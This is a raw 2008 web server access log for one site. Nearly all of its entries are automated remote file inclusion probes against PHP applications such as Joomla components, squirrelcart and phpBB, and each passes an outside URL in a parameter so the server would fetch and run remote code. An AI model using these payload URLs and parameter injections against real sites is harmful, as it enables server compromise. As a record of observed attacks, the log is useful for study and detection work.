193.23.172.8 - - [08/Apr/2008:09:35:41 -0700] "GET /logs/access_080218.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:35:42 -0700] "GET /logs/access_071231.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:35:43 -0700] "GET /logs/access_080306.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
207.210.91.50 - - [08/Apr/2008:09:35:44 -0700] "GET ///modules/newbb_plus/class/class.forumposts.php?bbPath[path]=http://ceze64.org/components/com_utchat/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
207.210.91.50 - - [08/Apr/2008:09:35:44 -0700] "GET /logs///modules/newbb_plus/class/class.forumposts.php?bbPath[path]=http://ceze64.org/components/com_utchat/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:35:47 -0700] "GET /logs/access_080313.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:35:50 -0700] "GET /logs/access_080219.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:35:50 -0700] "GET /logs/access_080123.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:09:35:54 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/belahan.memek/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:35:56 -0700] "GET /logs/access_080225.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:35:58 -0700] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:35:59 -0700] "GET /logs/access_071228.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
69.57.156.36 - - [08/Apr/2008:09:36:09 -0700] "GET /logs/access_080125.log/xGB.php?act=admin&do=http://barefootscience.com/usa/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.114.58 - - [08/Apr/2008:09:36:35 -0700] "GET /logs/access_080207.log//config.php?path_to_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.114.58 - - [08/Apr/2008:09:36:35 -0700] "GET //config.php?path_to_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.114.58 - - [08/Apr/2008:09:36:35 -0700] "GET /logs//config.php?path_to_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.38 - - [08/Apr/2008:09:36:38 -0700] "GET /tmp/sess_273f05d104d0873e7817739dc1f021f6 HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.52.114.58 - - [08/Apr/2008:09:36:44 -0700] "GET /logs/access_080213.log//config.php?path_to_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:09:36:51 -0700] "GET /logs/access_080118.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:36:51 -0700] "GET /logs/access_071225.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:09:37:10 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:09:37:10 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:09:37:10 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:37:20 -0700] "GET /logs/access_071215.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:37:20 -0700] "GET /logs/access_080308.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:09:37:28 -0700] "GET /logs/access.log//squirrelcart/cart_content.php?cart_isp_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:09:37:29 -0700] "GET //squirrelcart/cart_content.php?cart_isp_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:09:37:29 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:37:42 -0700] "GET /logs/access_080128.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:38:02 -0700] "GET /logs/access_080211.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:09:38:03 -0700] "GET /logs/access_080215.log//squirrelcart/cart_content.php?cart_isp_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:38:07 -0700] "GET /logs/access_080129.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:38:08 -0700] "GET /logs/access_080309.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:38:14 -0700] "GET /logs/access_071227.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:38:15 -0700] "GET /logs/access_071229.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:38:19 -0700] "GET /logs/access_071230.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:38:28 -0700] "GET /logs/access_080131.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:38:35 -0700] "GET /logs/access_080218.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:38:37 -0700] "GET /logs/access_071231.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:38:44 -0700] "GET /logs/access_080306.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:38:49 -0700] "GET /logs/access_080219.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:38:53 -0700] "GET /logs/access_080123.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:38:57 -0700] "GET /logs/access_080225.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:38:57 -0700] "GET /logs/access_071228.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.157.210 - - [08/Apr/2008:09:39:00 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.157.210 - - [08/Apr/2008:09:39:01 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.157.210 - - [08/Apr/2008:09:39:01 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.133.62 - - [08/Apr/2008:09:39:12 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.xdengue.xpg.com.br/sefe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.114.58 - - [08/Apr/2008:09:39:20 -0700] "GET /logs/access_080118.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.114.58 - - [08/Apr/2008:09:39:29 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.114.58 - - [08/Apr/2008:09:39:29 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.114.58 - - [08/Apr/2008:09:39:29 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.222.36.82 - - [08/Apr/2008:09:39:33 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.222.36.82 - - [08/Apr/2008:09:39:40 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://61.129.163.4/on.txt?????? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
61.222.36.82 - - [08/Apr/2008:09:39:48 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.133.62 - - [08/Apr/2008:09:39:55 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.xdengue.xpg.com.br/sefe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.133.62 - - [08/Apr/2008:09:39:56 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.xdengue.xpg.com.br/sefe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.114.58 - - [08/Apr/2008:09:40:06 -0700] "GET /logs/access.log//squirrelcart/cart_content.php?cart_isp_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.114.58 - - [08/Apr/2008:09:40:06 -0700] "GET //squirrelcart/cart_content.php?cart_isp_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.114.58 - - [08/Apr/2008:09:40:07 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [08/Apr/2008:09:40:19 -0700] "GET /logs/access_080126.log//matic/include/libchart-1.1/libchart.php?tm_includepath=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [08/Apr/2008:09:40:20 -0700] "GET //matic/include/libchart-1.1/libchart.php?tm_includepath=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [08/Apr/2008:09:40:20 -0700] "GET /logs//matic/include/libchart-1.1/libchart.php?tm_includepath=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.48.204.130 - - [08/Apr/2008:09:40:34 -0700] "GET /logs/access_080216.log//tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
202.53.24.188 - - [08/Apr/2008:09:40:55 -0700] "GET /logs/access_080218.log/index.php?pagina=http://www.thenationalcouncil.com/webcalendar/tools/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.114.58 - - [08/Apr/2008:09:40:55 -0700] "GET /logs/access_080215.log//squirrelcart/cart_content.php?cart_isp_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.53.24.188 - - [08/Apr/2008:09:40:57 -0700] "GET /index.php?pagina=http://www.thenationalcouncil.com/webcalendar/tools/di?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
202.53.24.188 - - [08/Apr/2008:09:40:58 -0700] "GET /logs/index.php?pagina=http://www.thenationalcouncil.com/webcalendar/tools/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:41:20 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:41:59 -0700] "GET /logs/access_071122.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
66.232.156.130 - - [08/Apr/2008:09:42:03 -0700] "GET //viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://tompakovcapital.com/.dat/idscan4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:42:28 -0700] "GET /logs/access_080114.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:09:42:40 -0700] "GET /logs/access_080329.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:09:42:45 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:09:42:45 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.114.58 - - [08/Apr/2008:09:42:47 -0700] "GET /logs/access_080329.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.114.58 - - [08/Apr/2008:09:42:47 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.114.58 - - [08/Apr/2008:09:42:47 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.23.172.8 - - [08/Apr/2008:09:43:24 -0700] "GET /logs/access_080107.log//components/com_simpleboard/image_upload.php?sbp=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
67.195.52.59 - - [08/Apr/2008:09:43:59 -0700] "GET /blane/?M=D HTTP/1.0" 200 649 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:09:44:06 -0700] "GET /logs/access.log//squirrelcart/cart_content.php?cart_isp_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:09:44:06 -0700] "GET //squirrelcart/cart_content.php?cart_isp_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:09:44:06 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:44:16 -0700] "GET /logs/access_071122.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:44:29 -0700] "GET /logs/access_080114.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:09:44:33 -0700] "GET /logs/access_080215.log//squirrelcart/cart_content.php?cart_isp_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:44:56 -0700] "GET /logs/access_080107.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.114.58 - - [08/Apr/2008:09:46:09 -0700] "GET /logs/access.log//squirrelcart/cart_content.php?cart_isp_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.114.58 - - [08/Apr/2008:09:46:09 -0700] "GET //squirrelcart/cart_content.php?cart_isp_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.114.58 - - [08/Apr/2008:09:46:09 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.34.218 - - [08/Apr/2008:09:46:10 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://cyclonekey.100webspace.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
85.214.34.218 - - [08/Apr/2008:09:46:13 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://cyclonekey.100webspace.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
74.52.114.58 - - [08/Apr/2008:09:46:55 -0700] "GET /logs/access_080215.log//squirrelcart/cart_content.php?cart_isp_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.222.36.82 - - [08/Apr/2008:09:47:15 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.222.36.82 - - [08/Apr/2008:09:47:23 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://61.129.163.4/on.txt?????? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:09:47:28 -0700] "GET /logs/access_080218.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:09:47:29 -0700] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:09:47:29 -0700] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.222.36.82 - - [08/Apr/2008:09:47:32 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.42 - - [08/Apr/2008:09:47:58 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
67.212.173.42 - - [08/Apr/2008:09:47:58 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
69.57.156.36 - - [08/Apr/2008:09:48:09 -0700] "GET /logs/access_080218.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://barefootscience.com/usa/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.57.156.36 - - [08/Apr/2008:09:48:15 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://barefootscience.com/usa/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.222.36.82 - - [08/Apr/2008:09:48:15 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.156.36 - - [08/Apr/2008:09:48:16 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://barefootscience.com/usa/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.120.225.104 - - [08/Apr/2008:09:48:24 -0700] "GET /logs/access_080124.log//components/com_simpleboard/image_upload.php?sbp=http://ds3hdg.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.56.80 - - [08/Apr/2008:09:48:27 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/dokter/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:09:49:07 -0700] "GET /logs/access_080308.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [08/Apr/2008:09:49:21 -0700] "GET /logs/access_080329.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.53.24.188 - - [08/Apr/2008:09:49:34 -0700] "GET /logs/access_080211.log/index.php?pagina=http://www.thenationalcouncil.com/webcalendar/tools/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.156.36 - - [08/Apr/2008:09:49:41 -0700] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://barefootscience.com/usa/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.57.156.36 - - [08/Apr/2008:09:49:41 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://barefootscience.com/usa/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.57.156.36 - - [08/Apr/2008:09:49:43 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://barefootscience.com/usa/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.221.157.210 - - [08/Apr/2008:09:49:50 -0700] "GET /logs/access_080312.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
